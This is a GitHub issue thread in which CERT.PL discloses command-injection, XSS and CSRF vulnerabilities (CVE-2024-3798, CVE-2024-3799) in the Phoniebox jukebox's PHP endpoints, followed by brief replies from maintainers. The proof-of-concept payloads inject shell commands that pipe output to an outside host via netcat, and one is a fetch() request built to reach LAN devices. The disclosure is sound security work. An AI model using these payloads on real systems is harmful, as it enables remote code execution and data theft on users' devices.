search

MiczFlor / RPi-Jukebox-RFID

A Raspberry Pi jukebox, playing local music, podcasts, web radio and streams triggered by RFID cards, web app or home automation. All plug and play via USB. GPIO scripts available.
http://phoniebox.de
MIT License
1.3k stars 394 forks source link

🐛 | RCE/CSRF/XSS vulnerabilities #2342

Open lukigruszka opened 2 months ago

lukigruszka commented 2 months ago

Version

3.5.2 2.6

Branch

develop

OS

Ubuntu

Pi model

NA

Hardware

No response

What happened?

Hello, CERT.PL has found several vulnerabilities while performing a wider scan of open source projects. Since our last issue remained open, we've decided to post details here and reserve CVEs to make the discussion easier. We tested the current state of develop branch.

As we focus mainly on finding vulnerabilities, we may not be able to assist you in the process of preparing required fixes and/or validate their quality.

RCE/XSS/CSRF (CVE-2024-3798)

GET parameter file handled by htdocs/api/playlist/playsinglefile.php let's you execute commands POC: http://127.0.0.1:8002/RPi-Jukebox-RFID/htdocs/api/playlist/playsinglefile.php?file=%27;ls|nc%20web.kazet.cc%203333%20%23

Using the same parameter it's possible to exploit XSS vulnerability: http://127.0.0.1:8002/RPi-Jukebox-RFID/htdocs/api/playlist/playsinglefile.php?file=%3Cscript%3Ealert(1);%3C/script%3E

and also CSRF, which results in opening any file an attacker would point to.

RCE (CVE-2024-3799)

Sending a crafted POST request to htdocs/inc.setWifi.php let's you execute commands.

POC: fetch("http://127.0.0.1:8002/RPi-Jukebox-RFID/htdocs/inc.setWifi.php", {"headers": {"content-type": "application/x-www-form-urlencoded",},"body": "submitWifi=submit&WIFIssid_ls=lll&WIFIpass_ls=12345678';ls|nc web.kazet.cc 3333; #&WIFIprio_ls=1","method": "POST",}).then((response) => {return response.text(); }).then((data) => {console.log(data);})

While this file should not be directly accessible from the internet, one may think of a scenario when a Jukebox user visits a site with an included JS script, which would send such a request to multiple hosts on LAN network

Logs

No response

Configuration

No response

More info

No response

Groovylein commented 2 months ago

@lukigruszka thank you.

Currently we don't have any process in integrating vulnerabilities.

How did you find and catch this project in your process?

lukigruszka commented 2 months ago

We just searched for popular projects on GH and performed a relatively shallow check on them. Surely the scan was not intended to find all possible vulnerabilities, so other ones might exist in this project.

s-martin commented 2 months ago

@lukigruszka the version of Phoniebox is not correct, it's 2.6

lukigruszka commented 2 months ago

Thanks @s-martin for correcting the version, I must admit getting a bit confused by the branching strategy ;-)